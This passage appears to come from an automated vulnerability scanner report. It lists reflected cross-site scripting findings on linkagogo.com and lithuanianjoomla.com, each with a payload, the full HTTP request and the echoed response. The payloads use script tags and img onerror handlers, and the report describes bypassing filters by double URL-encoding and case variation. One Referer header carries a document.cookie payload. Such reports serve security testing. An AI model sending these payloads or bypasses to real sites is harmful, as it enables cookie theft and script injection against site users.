The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dcf1"><script>alert(1)</script>249de33cf45 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/AddNoPopup?url={u}6dcf1"><script>alert(1)</script>249de33cf45&title={t} HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:09 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27epjQ"
Last-Modified: Tue, 25 Jan 2011 04:42:10 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16356
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:42:09 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:42:09 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
<input type="text" name="url" value="{u}6dcf1"><script>alert(1)</script>249de33cf45" size="50" maxlength="2048" >
...[SNIP]...

4.1193. http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/7-joomla-naujienos/70-joomla-160-isleista.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1471%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4fb583d3360 was submitted in the REST URL parameter 1. This input was echoed as c1471"><script>alert(1)</script>4fb583d3360 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:36 GMT
Server: Apache
Set-Cookie: 2d3002958ebe475c6a8e5c841c44742a=173c304feeb1dfb81f054f2597ddca74; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/7-joomla-naujienosc1471"><script>alert(1)</script>4fb583d3360/70-joomla-160-isleista.html" />
...[SNIP]...

4.1194. http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/7-joomla-naujienos/70-joomla-160-isleista.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d560%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f1a33e564 was submitted in the REST URL parameter 2. This input was echoed as 9d560"><script>alert(1)</script>5f1a33e564 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /7-joomla-naujienos/9d560%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f1a33e564 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:25 GMT
Server: Apache
Set-Cookie: 2d3002958ebe475c6a8e5c841c44742a=14c3863e542d0a99b1068bfc91970394; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/7-joomla-naujienos/9d560"><script>alert(1)</script>5f1a33e564" />
...[SNIP]...

4.1195. http://www.lithuanianjoomla.com/apie-joomla.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/apie-joomla.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12405%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e2c290fd4de0 was submitted in the REST URL parameter 1. This input was echoed as 12405"><img src=a onerror=alert(1)>2c290fd4de0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /12405%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e2c290fd4de0 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:20 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/12405"><img src=a onerror=alert(1)>2c290fd4de0" />
...[SNIP]...

4.1196. http://www.lithuanianjoomla.com/component/users/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.lithuanianjoomla.com
Path:	/component/users/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9861%2522%253e%253ca%253e20822d6648d was submitted in the REST URL parameter 2. This input was echoed as d9861"><a>20822d6648d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /component/usersd9861%2522%253e%253ca%253e20822d6648d/ HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 404 Component not found
Date: Tue, 25 Jan 2011 00:08:50 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 4639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir
...[SNIP]...
<form action="/component/usersd9861"><a>20822d6648d/" method="post">
...[SNIP]...

4.1197. http://www.lithuanianjoomla.com/index.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a693f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efdcc0a4b4f0 was submitted in the REST URL parameter 1. This input was echoed as a693f"><img src=a onerror=alert(1)>fdcc0a4b4f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /a693f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efdcc0a4b4f0 HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:27:34 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/a693f"><img src=a onerror=alert(1)>fdcc0a4b4f0" />
...[SNIP]...

4.1198. http://www.lithuanianjoomla.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 317fb%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e72dcb99ea8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 317fb"><img src=a onerror=alert(1)>72dcb99ea8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /index.php/317fb%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e72dcb99ea8d HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:27:04 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/index.php/317fb"><img src=a onerror=alert(1)>72dcb99ea8d" />
...[SNIP]...

4.1199. http://www.lithuanianjoomla.com/joomla-naujienos.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a86e%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e34ea042109 was submitted in the REST URL parameter 1. This input was echoed as 2a86e"><ScRiPt>alert(1)</ScRiPt>34ea042109 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /2a86e%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e34ea042109 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:43 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 32271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/2a86e"><ScRiPt>alert(1)</ScRiPt>34ea042109" />
...[SNIP]...

4.1200. http://www.lithuanianjoomla.com/joomla-naujienos.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ad78%2522%253e%253ca%253efcdf697ff5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ad78"><a>fcdf697ff5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos.html?3ad78%2522%253e%253ca%253efcdf697ff5=1 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:30 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 21399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<link href="/joomla-naujienos.feed?3ad78"><a>fcdf697ff5=1&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1201. http://www.lithuanianjoomla.com/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdb66%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaabda2089b1 was submitted in the REST URL parameter 1. This input was echoed as fdb66"><script>alert(1)</script>aabda2089b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienosfdb66%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaabda2089b1/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:47 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienosfdb66"><script>alert(1)</script>aabda2089b1/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html" />
...[SNIP]...

4.1202. http://www.lithuanianjoomla.com/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7d3e%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee139b2265d1 was submitted in the REST URL parameter 2. This input was echoed as c7d3e"><img src=a onerror=alert(1)>e139b2265d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos/c7d3e%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee139b2265d1 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:20 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/c7d3e"><img src=a onerror=alert(1)>e139b2265d1" />
...[SNIP]...

4.1203. http://www.lithuanianjoomla.com/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71d66%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b01289864a was submitted in the REST URL parameter 1. This input was echoed as 71d66"><script>alert(1)</script>2b01289864a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos71d66%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b01289864a/3-lithuanianjoomlacom-logotipo-konkursas.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:45 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 17565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos71d66"><script>alert(1)</script>2b01289864a/3-lithuanianjoomlacom-logotipo-konkursas.html" />
...[SNIP]...

4.1204. http://www.lithuanianjoomla.com/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d852%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e0357309bacf was submitted in the REST URL parameter 2. This input was echoed as 5d852"><img src=a onerror=alert(1)>0357309bacf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos/5d852%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e0357309bacf HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:19 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 19121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/5d852"><img src=a onerror=alert(1)>0357309bacf" />
...[SNIP]...

4.1205. http://www.lithuanianjoomla.com/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61b93%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e948eee3faae was submitted in the REST URL parameter 1. This input was echoed as 61b93"><script>alert(1)</script>948eee3faae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos61b93%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e948eee3faae/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:24 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos61b93"><script>alert(1)</script>948eee3faae/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html" />
...[SNIP]...

4.1206. http://www.lithuanianjoomla.com/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5a70%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ef34b3f0f1a5 was submitted in the REST URL parameter 2. This input was echoed as e5a70"><img src=a onerror=alert(1)>f34b3f0f1a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos/e5a70%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ef34b3f0f1a5 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:06 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13613

